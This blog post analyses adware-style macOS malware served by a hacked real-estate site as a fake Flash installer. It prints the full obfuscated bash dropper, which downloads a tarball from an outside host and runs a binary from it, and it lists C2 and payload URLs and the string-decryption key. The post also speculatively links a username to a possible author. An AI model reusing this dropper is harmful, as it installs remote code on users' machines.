In this article, I will walk you through malware analysis distributed by a hacked kwmarina.com website.

I was searching for a new place to live in LA on Zillow and found an interesting location. The contact for it was Jesse Weinberg from Keller Williams Silicon Beach.
Screen-Shot-2018-06-10-at-12.35.20-PM

I googled this guy and the first result was marina.yourkwoffice.com. In fact, this is the website they list on their Facebook.
Screen-Shot-2018-06-10-at-12.37.13-PM

If you click on Search For Properties in Your Area in Chrome, you will be redirected to Flash download page that will automatically download Adobe Flash Player.dmg.

malwaredownload

I used https://www.freefileconvert.com/ to convert .dmg into a .zip to avoid autoruns.

After unzipping the file, I saw the usuall contents of the dmg archive, however the install script was just a bash script:
Screen-Shot-2018-06-10-at-12.44.21-PM

With the following content:

#!/bin/bash

dlDomain="wmbev.almondtoronto.win"
dlPath="sdl"
dir="${TMPDIR}/mmstmp"
dlUrl="http://${dlDomain}/${dlPath}/$(echo "YlcxVGRIVmlMblJoY2k1bmVnbz0K" | openssl base64 -d -A | openssl base64 -d -A)?ts=$(date +%s)"
binPath="${dir}/$(echo "YlcwdGFXNXpkR0ZzYkMxdFlXTnZjeTVoY0hBdlEyOXVkR1Z1ZEhNdlRXRmpUMU12YlcwdGFXNXpkR0ZzYkMxdFlXTnZjd289Cg==" | openssl base64 -d -A | openssl base64 -d -A)"
rm -rf "${dir}"
mkdir -p "${dir}"
curl -s -L -o "${dir}/stmp.tar.gz" "${dlUrl}"
tar -xvzf "${dir}/stmp.tar.gz" -C "${dir}"
chmod +x "${binPath}"
"${binPath}"

Essentially what this does is:

  1. Download http://wmbev.almondtoronto.win/sdl/mmStub.tar.gz
  2. Extract it
  3. Execute mm-install-macos.app/Contents/MacOS/mm-install-macos

These are the contents of mmStub.tar.gz
Screen-Shot-2018-06-10-at-12.53.00-PM

After checking the binary with IDA Pro, I see that it was written in Objective-C. Which is both a tip and a pain in the ass. The tip lies in the fact that some of the class names can be deobfuscated easily. The main in the ass is to track the X-Refs due to Objective-C messaging system - following an execution flow is tricky.

screenshots

I see there are some obfuscated strings. It appears that the author didn't try to obfuscate program's code, but instead obfuscated the C2C urls. As I mentioned above, we can see class names, and luckily there is a class specifically for encrypting and decrypting strings. Below is a screenshot of a function that decrypts a single byte, and wait for it.... it's a Vigenere ciper. Lol.
decrypt
Looking for the key doesn't take long either. If you stare a little at the assembly it will come to you.
class_init_key
The class is being initialized with the key 1522855729. I threw together a simple Python script and went on decrypting. You can see it here.

decrypt-urls

The malware's C2C lives on subdomains of macinstallerinfo.com. For example, the actual useful payload can be found at http://software.macsoftwareserver05.com/mac/mediaDownloader.tar.gz.
Which does nothing else but its adware stuff:
grabber
Nothing interesting.

Looking at the string one more time in the 2nd stage shows us this:
oopsie

The only guy with this username on internet is this one:
avivais2

Maybe just a bad concidence, but my bet its a bad opsec, just like his malware.